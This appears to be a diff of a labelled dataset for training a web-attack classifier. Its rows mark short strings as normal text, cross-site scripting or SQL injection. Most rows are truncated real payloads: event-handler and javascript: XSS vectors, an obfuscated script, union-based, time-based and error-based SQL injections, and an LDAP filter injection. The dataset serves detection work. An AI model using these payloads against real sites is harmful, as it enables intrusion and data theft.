correctly,0,normal,25257 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19760 -select,0,normal,26596 -replace,0,normal,23207 -"{""id"":null,""name"":""refused""}",0,normal,26874 -<strike onpointerover=alert(1)>XSS</strike>,1,XSS,1858 -"-6587' ) union all select 6349,6349,6349,6349,6349",2,SQLi,20288 -"{""id"":null,""name"":""Sangloupmon""}",0,normal,26922 -ORDER BY 3,2,SQLi,10307 -<svg><area onload=alert(1)></area>,1,XSS,2766 -"<img src=""blah""onmouseover=""document.vulnerable=tr",1,XSS,1542 -"<pre draggable=""true"" ondrag=""alert(1)"">test</pre>",1,XSS,7263 -"<col onkeyup=""alert(1)"" contenteditable>test</col>",1,XSS,8435 -Select a fitness class to stay healthy.,0,normal,23994 -"1"" ) ) union all select null,null,null#",2,SQLi,20485 -\x1Cjavascript:javascript:alert(1),1,XSS,9476 -"1"" or 4915 = ( select count ( * ) from domain.doma",2,SQLi,19765 -"1' ) ) ) or row ( 1045,7562 ) > ( select count ( *",2,SQLi,20900 -<option onpointermove=alert(1)>XSS</option>,1,XSS,8564 -"<legend onmousedown=""alert(1)"">test</legend>",1,XSS,3772 -"1' and make_set ( 2942 = 8200,8200 ) and 'jnhv' li",2,SQLi,13461 -1'+ ( select xwcl where 7997 = 7997,2,SQLi,17494 -<form id=x tabindex=1 onfocusin=alert(1)></form>,1,XSS,4656 -Select age.,0,normal,24774 -"select * from users where id = 1 or ""%."" or 1 = 1 ",2,SQLi,11435 -Save up to 35% off select on Select Polywood Patio,0,normal,25714 -<hr onpointerleave=alert(1)>XSS</hr>,1,XSS,8267 -"1"" ) ) or 7427 = dbms_pipe.receive_message ( chr (",2,SQLi,13390 -"<div id=""138""><link rel=""import"" href=""test.svg"" /",1,XSS,9127 -"1"" ) ) as dnhd where 2657 = 2657 or 4240 = ( selec",2,SQLi,12099 -select * from users where id = 1 or \<\ union sele,2,SQLi,11724 -Select a new outfit.,0,normal,22546 -"<div id=""105""><iframe src=""data:image/svg-xml,%1F%",1,XSS,9097 -"<tt onmouseover=""alert(1)"">test</tt>",1,XSS,1738 -"{""id"":null,""firstName"":""Quan"",""lastName"":""Yuan"",""s",0,normal,26849 +"<a target=""x"" href=""xssme?xss=%3Cscript%3EaddEvent",1,XSS,9066 +<svg id=`x`onload=alert(1)>,1,XSS,9458 +><script+src=https://www.youku.com/index_cookielis,1,XSS,9813 +"1"" ) ) as rpxd where 4929 = 4929",2,SQLi,12540 +1' ) and ( 1471 = 7892 ) *7892 and ( 'kkok' like ',2,SQLi,13292 +1' where 1893 = 1893 and 9254 = ( select count ( *,2,SQLi,13166 +"<IMG SRC=x ondurationchange=""alert(String.fromChar",1,XSS,1222 +"1', ( select ( case when ( 3576 = 7744 ) then 1 el",2,SQLi,12958 +%' or '0'='0,2,SQLi,9960 +"-5691' union all select 6610,6610#",2,SQLi,17417 +select * from users where id = 1 +$+ or 1 = 1 -- 1,2,SQLi,11378 +High Fashion Home:High Fashion Home is offering 21,0,normal,26101 +"1"" where 1537 = 1537 and ( select 9067 from ( sele",2,SQLi,18388 +"<noembed ondblclick=""alert(1)"">test</noembed>",1,XSS,5612 +"select * from users where id = 1 or @#""{ = 1 union",2,SQLi,11910 +<meter onfocusout=alert(1) tabindex=1 id=x></meter,1,XSS,4584 +hour,0,normal,23203 +ORDER BY 22#,2,SQLi,10295 +%3Cx onxxx=alert(1),1,XSS,9680 +<tbody id=x tabindex=1 onfocusin=alert(1)></tbody>,1,XSS,2525 +-7426' order by 1#,2,SQLi,14185 +"Leesa offers a ""white glove"" delivery service in s",0,normal,25911 +"<applet oncontextmenu=""alert(1)"">test</applet>",1,XSS,7463 +"<keygen onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,4785 +<style>:target {color: red;}</style><details id=x ,1,XSS,4384 +1'|| ( select 'ymre' where 8681 = 8681,2,SQLi,19704 +"1"" ) where 6065 = 6065 and 6510 = ( select count (",2,SQLi,20486 +1%' ) ) ) or 5286 = ( select count ( * ) from all_,2,SQLi,14438 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7645 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6455 +1' ) rlike ( select ( case when ( 7689 = 7689 ) th,2,SQLi,18552 +"<mark draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,8812 +"{""id"":null,""name"":""Seismitoad""}",0,normal,27351 +Select the channel.,0,normal,24817 +We must select one from among these applicants.,0,normal,25173 +1%' ) ) and ( select 2* ( if ( ( select * from ( s,2,SQLi,20853 +"UNION SELECT @@VERSION,SLEEP(5),""'3",2,SQLi,10621 +1'+ ( select ouhd where 8905 = 8905 and 6510 = ( s,2,SQLi,14943 +select ( case when ( 3076 = 3596 ) then 3076 else ,2,SQLi,12965 +"<address onbeforecut=""alert(1)"" contenteditable>te",1,XSS,7640 +-8701%' ) ) or ( 4843 = 1690 ) *1690 and ( ( '%' =,2,SQLi,16036 + or 3=3 --,2,SQLi,10199 +"<spacer onmouseout=""alert(1)"">test</spacer>",1,XSS,6857 +"UNION SELECT @@VERSION,SLEEP(5),""'3'""#",2,SQLi,10622 +RLIKE SLEEP(5) OR '1337'='1337,2,SQLi,11242 +exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&q,1,XSS,1388 +Let's select a movie.,0,normal,24452 +`'><script>\x3Bjavascript:alert(1)</script>,1,XSS,556 +1 ) as gfhf where 5804 = 5804 or 6793 = ( select 6,2,SQLi,18708 +"1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( (",2,SQLi,16707 +"<output onmousemove=""alert(1)"">test</output>",1,XSS,3097 +<title id=x tabindex=1 onfocus=alert(1)></title>,1,XSS,3288 +"admin"" or 1=1#",2,SQLi,9933 +<eval>new ActiveXObject(&apos;htmlfile&apos;).pare,1,XSS,9169 +"1 where 2292 = 2292 union all select null,null,nul",2,SQLi,17457 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7850 +"<STYLE>li {list-style-image: url(\""javascript:aler",1,XSS,1315 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11098 +"<canvas onmouseover=""alert(1)"">test</canvas>",1,XSS,7453 +Select the most comfortable chair in the room.,0,normal,24038 +"-8093"" ) ) as oboi where 1476 = 1476 union all sel",2,SQLi,14709 +")) AND ELT(1337=1337,SLEEP(5)) AND (('1337'='1337",2,SQLi,11248 +<button onMouseMove=javascript:alert(1)>,1,XSS,9634 +<meter id=x tabindex=1 onfocus=alert(1)></meter>,1,XSS,5075 +"Select the ""General"" tab from the left sidebar (ag",0,normal,25605 +"<td onkeydown=""alert(1)"" contenteditable>test</td>",1,XSS,5278 +"1 ) ) or row ( 1045,7562 ) > ( select count ( * ) ",2,SQLi,18656 +"select sleep ( 5 ) and ""irxg"" = ""irxg",2,SQLi,20425 +1 ) ) as bgdm where 3473 = 3473 or updatexml ( 180,2,SQLi,19758 +"In the menu, find the name of your Mac and select.",0,normal,25995 +minute,0,normal,23204 +"You can select ""Penguin Brand Dry Ice Retailer"" an",0,normal,25084 +<style>:target {color:red;}</style><picture id=x s,1,XSS,1859 +"-4340 ) ) or make_set ( 9354 = 9354,7185 ) and ( (",2,SQLi,21157 +"{""id"":null,""firstName"":""James"",""lastName"":""Poh"",""s",0,normal,26919 +ORDER BY 5,2,SQLi,10309 +"<spacer onkeydown=""alert(1)"" contenteditable>test<",1,XSS,2767 +"<img src=""blah>"" onmouseover=""document.vulnerable=",1,XSS,1543 +<style>:target {color: red;}</style><article id=x ,1,XSS,7265 +"<tt oncopy=""alert(1)"" contenteditable>test</tt>",1,XSS,8437 +Select the right palette for the artwork.,0,normal,23991 +"-1196"" ) ) or 1570 = convert ( int, ( select char ",2,SQLi,20483 +\xE2\x80\x85javascript:javascript:alert(1),1,XSS,9478 +"{""id"":null,""firstName"":""Elisa"",""lastName"":""Mak"",""a",0,normal,26812 +"1 ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,20898 +<video id=x tabindex=1 onactivate=alert(1)></video,1,XSS,8566 +"<section oncut=""alert(1)"" contenteditable>test</se",1,XSS,3774 +"-2925%"" or make_set ( 9354 = 9354,7185 ) and ""%"" =",2,SQLi,13463 +"-5657' ) ) ) union all select 8071,8071,8071,8071,",2,SQLi,17496 +"<progress onkeydown=""alert(1)"" contenteditable>tes",1,XSS,4658 +Select gain.,0,normal,24771 +"select * from users where id = 1 or "",."" or 1 = 1 ",2,SQLi,11437 +Save up to 40% on select networking and storage pr,0,normal,25711 +"<option onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,8269 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13392 +"<div id=""29""><link rel=stylesheet href=data:,*%7bx",1,XSS,9129 +1' ) where 6941 = 6941 and 6537 = dbms_pipe.receiv,2,SQLi,12101 +select * from users where id = 1 * ( \ ) union sel,2,SQLi,11726 +#ERROR!,2,SQLi,22543 +"<div id=""109""><svg xmlns=""http://www.w3.org/2000/s",1,XSS,9099 +<a onblur=alert(1) tabindex=1 id=x></a><input auto,1,XSS,1739 +"{""id"":null,""firstName"":""Leong"",""lastName"":""Tommi"",",0,normal,27141 `'><script>\x09javascript:alert(1)</script>,1,XSS,562 -1' where 8837 = 8837 and 5556 = ( select count ( *,2,SQLi,15358 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,19749 -"<output ondblclick=""alert(1)"">test</output>",1,XSS,3346 -select * from users where id = 1 + $+*\ union sele,2,SQLi,11493 -<x onmouseup=alert(1)>click this!,1,XSS,9355 -<button onMediaError=javascript:alert(1)>,1,XSS,9629 -<textarea onchange=alert(1)>XSS</textarea>,1,XSS,8315 -Merge the colorful threads.,0,normal,22581 -"<img src=""1"" onerror=""&#x61;&#x6c;&#x65;&#x72;&#x7",1,XSS,9720 -"make_set ( 5679 = 9769,9769 )",2,SQLi,21752 -It's not clear how Twitter plans to select its tes,0,normal,25939 +1' ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ,2,SQLi,15360 +Merge the financial accounts.,0,normal,22705 +"<area ondblclick=""alert(1)"">test</area>",1,XSS,3348 +",execute immediate 'sel' || 'ect us' || 'er'",2,SQLi,11495 +<x onxxx=1 onxxx=1,1,XSS,9357 +<button onMouseDown=javascript:alert(1)>,1,XSS,9631 +<base onpointerout=alert(1)>XSS</base>,1,XSS,8317 +"1"" ) or 6979 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,19995 +"<script>$=~[];$={___:++$,$$$$:(![]+"""")[$],__$:++$,",1,XSS,9722 +"-8725"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( ""v",2,SQLi,21750 +"J. Crew: Take 5003 percent off select styles, thro",0,normal,25936 "<xss oncut=alert(1) value=""XSS"" autofocus tabindex",1,XSS,59 -"-6618"" ) ) ) order by 1#",2,SQLi,15154 -<figure onpointerout=alert(1)>XSS</figure>,1,XSS,3202 -"{""id"":null,""name"":""Australian Mist""}",0,normal,27612 -1'|| ( select 'osux' from dual where 7066 = 7066 o,2,SQLi,18034 -<title onpointerdown=alert(1)>XSS</title>,1,XSS,2511 -<h1>INJECTX</h1>,1,XSS,9829 -1 ) as ocut where 6800 = 6800 and elt ( 4249 = 424,2,SQLi,17323 -"{""id"":null,""firstName"":""Douglas"",""lastName"":""Danap",0,normal,26936 -"-7923"" ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,20542 -"-3817"" ) as vugz where 3064 = 3064 or 9323 = 9323#",2,SQLi,21092 -or 1 = 1,2,SQLi,11760 -"1"" ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16139 -*(|(mail=*)),2,SQLi,10175 -1'+ ( select taga where 8036 = 8036,2,SQLi,13547 -Retrieve rows where applicable.,0,normal,23296 -"<script onmousedown=""alert(1)"">test</script>",1,XSS,5994 --2798'+ ( select 'emui' where 9565 = 9565 union al,2,SQLi,22027 -Call Me By Your Name is currently playing in selec,0,normal,26296 -Modify the privacy policy for compliance.,0,normal,22981 +"1"" ) ) and 8594 = ( select 8594 from pg_sleep ( 5 ",2,SQLi,15156 +<center id=x tabindex=1 onfocusin=alert(1)></cente,1,XSS,3204 +"1"" union all select null,null,null,null,null,null,",2,SQLi,22117 +"1"" union all select null,null,null,null,null,null,",2,SQLi,18036 +"<video autoplay onplay=alert(1)><source src=""valid",1,XSS,2512 +<svg><script>/<@/>alert(1)</script>//INJECTX,1,XSS,9831 +"1"" ) ) ( select ( case when ( 4587 = 4587 ) then r",2,SQLi,17325 +"{""id"":null,""name"":""gray""}",0,normal,26933 +"1"" ) ) as ikuz where 7385 = 7385",2,SQLi,20540 +1' ) ) ) or 7552 = ( select count ( * ) from rdb$f,2,SQLi,21090 +", if not ( ( select serverproperty ( 'isintegrated",2,SQLi,11762 +-9574' ) as rxym where 4719 = 4719 union all selec,2,SQLi,16141 +%2A%28%7C%28mail%3D%2A%29%29,2,SQLi,10177 +1' ) ) ) and ( select 9067 from ( select count ( *,2,SQLi,13549 +1' ) ) as joco where 2922 = 2922,2,SQLi,22356 +<script onpointerdown=alert(1)>XSS</script>,1,XSS,5996 +1' ) where 7478 = 7478,2,SQLi,22025 +Car owners download the free app and select prefer,0,normal,26293 +Join the fitness club for a healthier lifestyle.,0,normal,22929 "{""id"":null,""name"":""trip""}",0,normal,27516 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2073 -1%' and 4386 = utl_inaddr.get_host_address ( chr (,2,SQLi,12123 -"{""id"":null,""name"":""fight light""}",0,normal,26783 -<style>:target {color: red;}</style><big id=x styl,1,XSS,5823 -How did you select which women to feature in the d,0,normal,26080 -1 and 6802 = 3592--,2,SQLi,13336 -"-7691"" or 1 group by concat ( 0x7171706a71, ( sele",2,SQLi,16880 -"<link onkeyup=""alert(1)"" contenteditable>test</lin",1,XSS,3514 -Delete the old emails from your inbox.,0,normal,22906 -Select a place to hang out with friends.,0,normal,24102 -1%' and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,16270 -"1%' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,20522 -1' in boolean mode ) and 6240 = ( 'qqpjq'|| ( sele,2,SQLi,16344 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,17151 -"<slot onmouseleave=""alert(1)"">test</slot>",1,XSS,3783 -Where's the WHERE clause?,0,normal,23464 -<x contenteditable onfocus=alert(1)>focus this!,1,XSS,9337 -"-6263%"" ) ) or 4747 = dbms_utility.sqlid_to_sqlhas",2,SQLi,19606 -Home Depot: Up to 50% off select patio furniture; ,0,normal,26089 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10703 -"<i draggable=""true"" ondragstart=""alert(1)"">test</i",1,XSS,2861 -"<IMG SRC=x ondurationchange=""alert(String.fromChar",1,XSS,1222 -"{""id"":null,""name"":""main""}",0,normal,27511 -<template onpointermove=alert(1)>XSS</template>,1,XSS,4865 -1'+ ( select echl where 6593 = 6593 rlike ( select,2,SQLi,13281 -1 and 8594 = ( select 8594 from pg_sleep ( 5 ) ) -,2,SQLi,19869 -<tfoot id=x tabindex=1 onactivate=alert(1)></tfoot,1,XSS,6086 -1'|| ( select 'noik' from dual where 9851 = 9851,2,SQLi,12547 -1' and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||,2,SQLi,15270 -"<isindex oncontextmenu=""alert(1)"">test</isindex>",1,XSS,4925 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4533 -"<;A HREF="";//www.google.com/"";>;XSS<;/A>;",1,XSS,1673 --9581 ) as jkqo where 5200 = 5200 or 6872 = 6872--,2,SQLi,21103 -1' in boolean mode ) and 7533 = 7533#,2,SQLi,21283 -"<canvas onkeypress=""alert(1)"" contenteditable>test",1,XSS,4056 -Filter results where necessary.,0,normal,23441 -Select love.,0,normal,24740 -) or '1′='1–,2,SQLi,10001 -"-5840' ) or elt ( 1032 = 1032,3623 )",2,SQLi,21360 -"admin"" ) or ""1"" = ""1""#",2,SQLi,11954 -1' ) ) ) ( select ( case when ( 5451 = 5451 ) then,2,SQLi,22456 -WHERE 1=1 AND 1=0,2,SQLi,10238 -"-1999 ) union all select 1779,1779,1779,1779,1779,",2,SQLi,22274 -ORDER BY 14--,2,SQLi,10256 -1'+ ( select ahyw where 6893 = 6893 waitfor delay ,2,SQLi,13306 ---></title></textarea></style></noscript></noembed,1,XSS,9488 -1' ) or 8421 = ( select count ( * ) from generate_,2,SQLi,20848 -1' ) ) as mqnv where 9831 = 9831,2,SQLi,12880 -To check that the SQL transact statement really is,0,normal,25279 -"<ol oncopy=""alert(1)"" contenteditable>test</ol>",1,XSS,4318 -) or ('1'='1--,2,SQLi,9981 -<tr id=x tabindex=1 onbeforeactivate=alert(1)></tr,1,XSS,5520 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2074 +"1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,12125 +"{""id"":null,""name"":""my""}",0,normal,26780 +"<table onmouseout=""alert(1)"">test</table>",1,XSS,5825 +How to watch it: Tully is playing in select theate,0,normal,26077 +"1' ) and elt ( 4249 = 4249,7259 ) and ( 'bkag' = '",2,SQLi,13338 +1'|| ( select 'aoad' where 8795 = 8795 and char ( ,2,SQLi,16882 +"<track onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,3516 +Where's your SQL assignment?,0,normal,23425 +Select the best course of action.,0,normal,24099 +1' ) ) as vrwr where 3830 = 3830,2,SQLi,16272 +1' ) as sjij where 8659 = 8659,2,SQLi,20520 +-6145'+ ( select nnjn where 1389 = 1389 union all ,2,SQLi,16346 +"1"" or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||ch",2,SQLi,17153 +"<u oncontextmenu=""alert(1)"">test</u>",1,XSS,3785 +Specify conditions where necessary.,0,normal,23461 +<x contenteditable onkeydown=alert(1)>press any ke,1,XSS,9339 +"1"" ) as nixg where 4580 = 4580 and 4241 = convert ",2,SQLi,21799 +Hormel said its products launched this week in sel,0,normal,26086 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10705 +"<samp onmouseleave=""alert(1)"">test</samp>",1,XSS,2862 +"<IMG SRC=x onemptied=""alert(String.fromCharCode(88",1,XSS,1223 +"1"" where 3221 = 3221 or updatexml ( 1808,concat ( ",2,SQLi,21242 +<link onfocus=alert(1) id=x tabindex=1 style=displ,1,XSS,4867 +"-8369"" ) ) union all select 2191--",2,SQLi,13283 +"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,19867 +"<details ondblclick=""alert(1)"">test</details>",1,XSS,6088 +"-3501"" ) ) ) or ( 6789 = 6990 ) *6990 and ( ( ( ""j",2,SQLi,12549 +"1%"" ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113",2,SQLi,15272 +<style>:target {color:red;}</style><footer id=x st,1,XSS,4927 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4535 +"<;A HREF="";//google"";>;XSS<;/A>;",1,XSS,1674 +"1"" ) ) as yfpl where 4820 = 4820 union all select ",2,SQLi,21101 +1' ) as ftyp where 5851 = 5851 or 4240 = ( select ,2,SQLi,21281 +"<head onkeydown=""alert(1)"" contenteditable>test</h",1,XSS,4058 +Where do you want it?,0,normal,23438 +Select assist.,0,normal,24737 +or 1=1 LIMIT 1;#,2,SQLi,10003 +1'|| ( select 'irfn' where 8360 = 8360,2,SQLi,21358 +"select * from users where id = '1' union select 1,",2,SQLi,11956 +1 ) as zmxb where 8424 = 8424 and 2853 = cast ( ( ,2,SQLi,22453 +WHERE 1=1 AND 1=0#,2,SQLi,10240 +"1"" ) ) as sqzh where 5672 = 5672 and 5556 = ( sele",2,SQLi,22272 +ORDER BY 16--,2,SQLi,10258 +select pg_sleep ( 5 ) and ( 'vnss' like 'vnss,2,SQLi,13308 +--></style></script><svg oNload=alert()>,1,XSS,9490 +"1"" ) as mwja where 7881 = 7881 and row ( 6237,7469",2,SQLi,20846 +select ( case when ( 8331 = 5625 ) then 8331 else ,2,SQLi,12882 +To display the raster you have opened select ' Ras,0,normal,25276 +"<input onpaste=alert(1) value="""" autofocus>",1,XSS,4320 +) or ('1'='1'/*,2,SQLi,9983 +<i id=x tabindex=1 onbeforedeactivate=alert(1)></i,1,XSS,5522 <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF,1,XSS,859 -"1"" ) as zuzm where 1211 = 1211 and elt ( 5458 = 29",2,SQLi,21214 -<base onfocusout=alert(1) tabindex=1 id=x></base><,1,XSS,5973 -"<tfoot oncopy=""alert(1)"" contenteditable>test</tfo",1,XSS,7876 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21212 +<style>:target {color: red;}</style><track id=x st,1,XSS,5975 +"<ins oncopy=""alert(1)"" contenteditable>test</ins>",1,XSS,7878 /><img/onerror=\x27javascript:alert(1)\x27src=xxx:,1,XSS,596 -"<tt draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,8805 -"<html xmlns=""http://www.w3.org/1999/xhtml"">",1,XSS,9187 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10971 -A” autofocus onfocus=alert(“XSS”)//,1,XSS,9747 --2891 where 1770 = 1770 or 9290 = 5866,2,SQLi,14353 -"1"" ) ) ) and 8407 = ( select count ( * ) from gene",2,SQLi,22417 -<link onfocusout=alert(1) tabindex=1 id=x></link><,1,XSS,1952 -"<div id=""132""><!doctype html>",1,XSS,9121 -1 ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,22029 -"1%"" or 6979 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,21131 -"1"" ) ) as nhus where 3689 = 3689",2,SQLi,19315 -"<dl onkeypress=""alert(1)"" contenteditable>test</dl",1,XSS,7911 -1'+ ( select tart where 9861 = 9861,2,SQLi,14782 -<dt id=x tabindex=1 onfocus=alert(1)></dt>,1,XSS,7831 -"<table draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2514 -"<head draggable=""true"" ondrag=""alert(1)"">test</hea",1,XSS,6733 -"<noscript onbeforecopy=""alert(1)"" contenteditable>",1,XSS,5560 +<xmp onpointerleave=alert(1)>XSS</xmp>,1,XSS,8807 +"<if expr=""new ActiveXObject('htmlfile').parentWind",1,XSS,9189 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10973 +"<a href=""javascript:alert(1)"">ssss</a>",1,XSS,9749 +1'+ ( select rqcw where 9002 = 9002 union all sele,2,SQLi,14355 +"1 union all select null,null,null,null,null,null,n",2,SQLi,22163 +<command onpointerleave=alert(1)>XSS</command>,1,XSS,1953 +"<div id=""134""><xmp>",1,XSS,9123 +-2798'+ ( select 'emui' where 9565 = 9565 union al,2,SQLi,22027 +1'+ ( select 'yfrs' where 4388 = 4388 and 9254 = (,2,SQLi,21129 +"-8794 ) ) ) union all select 5802,5802,5802--",2,SQLi,19313 +<tr onpointermove=alert(1)>XSS</tr>,1,XSS,7913 +"1"" ) as pydh where 3407 = 3407 and 6510 = ( select",2,SQLi,14784 +"<output onmousedown=""alert(1)"">test</output>",1,XSS,7833 +"<i onkeypress=""alert(1)"" contenteditable>test</i>",1,XSS,2515 +<xss id=x tabindex=1 onfocusin=alert(1)></xss>,1,XSS,6735 +"<i onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,5562 "{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bha",0,normal,27402 -"<datalist draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7861 -") and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11028 -<rp id=x tabindex=1 onfocusin=alert(1)></rp>,1,XSS,4701 -<picture id=x tabindex=1 ondeactivate=alert(1)></p,1,XSS,2234 -"To select multiple rows hold down the ""shift"" key ",0,normal,25243 -1 ) ) as aqpy where 4027 = 4027 or 7417 = ( select,2,SQLi,17561 -1'|| ( select 'votg' where 5105 = 5105 or 8156 = (,2,SQLi,16161 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,15093 -"select * from users where id = 1 or "" ( 1"" or 1 = ",2,SQLi,11927 -"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'me",2,SQLi,20039 -"<input name=""password"" type=""password"" value=""secr",1,XSS,9216 -1'|| ( select 'glyc' from dual where 4058 = 4058,2,SQLi,20517 -1' in boolean mode ) and ( select * from ( select ,2,SQLi,20413 -<p id=x tabindex=1 onfocus=alert(1)></p>,1,XSS,5425 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13266 -1' ) or ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,15568 --7940' ) union all select 6024--,2,SQLi,12502 -"<footer draggable=""true"" ondrag=""alert(1)"">test</f",1,XSS,7493 -Identify columns where valid.,0,normal,23310 -onmouseover=alert(1)//%27%22--%3E%3C%2Fstyle%3E%3C,1,XSS,8996 -"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://www.s",1,XSS,1551 -1' in boolean mode ) or 7417 = ( select count ( * ,2,SQLi,17394 -1%' ) ) ) or 2633 = dbms_pipe.receive_message ( ch,2,SQLi,14843 -))) waitfor delay '0:0:20' --,2,SQLi,10930 -"1"" where 4991 = 4991 or char ( 119 ) ||char ( 100 ",2,SQLi,19101 -"<kbd ondblclick=""alert(1)"">test</kbd>",1,XSS,5096 -1' in boolean mode ) and 8514 = ( select count ( *,2,SQLi,17033 -"<marquee ondblclick=""alert(1)"">test</marquee>",1,XSS,3244 -? or 1=1 --,2,SQLi,11055 +"<meta oncut=""alert(1)"" contenteditable>test</meta>",1,XSS,7863 +") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11030 +"<blink onmouseout=""alert(1)"">test</blink>",1,XSS,4703 +"<caption onmouseup=""alert(1)"">test</caption>",1,XSS,2235 +"Today, the company is actually launching that feat",0,normal,25240 +1 ) ) ) and 9254 = ( select count ( * ) from rdb$f,2,SQLi,17563 +1 ) where 1096 = 1096,2,SQLi,16163 +"1%"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and (",2,SQLi,15095 +select * from users where id = 1 +1<@ union select,2,SQLi,11929 +1%' ) ) ) and 6537 = dbms_pipe.receive_message ( c,2,SQLi,20037 +"<input name=""username"" value=""admin"" />",1,XSS,9218 +1' ) ) as uncy where 8009 = 8009 union all select ,2,SQLi,20515 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,20411 +"<style>@keyframes slidein {}</style><abbr style=""a",1,XSS,5427 +1' ) ) as xqvq where 4816 = 4816 or 4240 = ( selec,2,SQLi,13268 +1' ) ) and 6414 = ( select count ( * ) from rdb$fi,2,SQLi,15570 +1%' and ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,12504 +"<menuitem ondblclick=""alert(1)"">test</menuitem>",1,XSS,7495 +Select a comfortable pillow for the night.,0,normal,22975 +%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshado,1,XSS,8998 +"<HTML xmlns:xss><?import namespace=""xss"" implement",1,XSS,1552 +"1%' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17396 +1%' rlike ( select ( case when ( 7689 = 7689 ) the,2,SQLi,14845 +)))) waitfor delay '0:0:20' --,2,SQLi,10932 +Amazon is offering up to 1033% off select Twitch C,0,normal,26379 +<caption id=x tabindex=1 onfocusin=alert(1)></capt,1,XSS,5098 +"1%"" ) and 3202 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,17035 +"<svg onkeydown=""alert(1)"" contenteditable>test</sv",1,XSS,3246 +1 and user_name() = 'dbo',2,SQLi,11057 "<div id=""x"">x</div> <xml:namespace prefix=""t""> <im",1,XSS,728 -"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,16126 -( select ( case when ( 8130 = 5894 ) then 8130 els,2,SQLi,14592 -"<div id=""43""><?xml version=""1.0"" standalone=""no""?>",1,XSS,9134 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8170 +"1%"" ) or char ( 119 ) ||char ( 100 ) ||char ( 99 )",2,SQLi,16128 +1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --,2,SQLi,14594 +"<div id=""53""><xml id=""xss"" src=""test.htc""></xml>",1,XSS,9136 +<noscript onpointermove=alert(1)>XSS</noscript>,1,XSS,8172 "<form><a href=""javascript:\u0061lert(1)"">X",1,XSS,332 -<svg><abbr onload=alert(1)></abbr>,1,XSS,7028 -"end and ( ( ( ""zpii"" like ""zpii",2,SQLi,13810 +<meter onpointerout=alert(1)>XSS</meter>,1,XSS,7030 +select ( case when ( 5970 = 2200 ) then 1 else 597,2,SQLi,13812 <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&,1,XSS,212 -A select band of just 29 talking heads featured in,0,normal,26424 -<picture id=x tabindex=1 onactivate=alert(1)></pic,1,XSS,2264 -<style onload=alert(1)></style>,1,XSS,6344 -Lulu & Georgia: Up to 70% off select items in semi,0,normal,25902 -"1"" ) ) as tpeh where 6306 = 6306 and 5965 = 5806#",2,SQLi,18166 -#ERROR!,2,SQLi,11368 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3544 -&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos,1,XSS,1439 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10708 -1' ) where 2852 = 2852,2,SQLi,16252 -1%' ) ) ) and sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,18819 -Delete the old messages from your chat.,0,normal,22947 -<sup onpointerover=alert(1)>XSS</sup>,1,XSS,4793 -[notmalicious](javascript://%0d%0awindow.onerror=a,1,XSS,9421 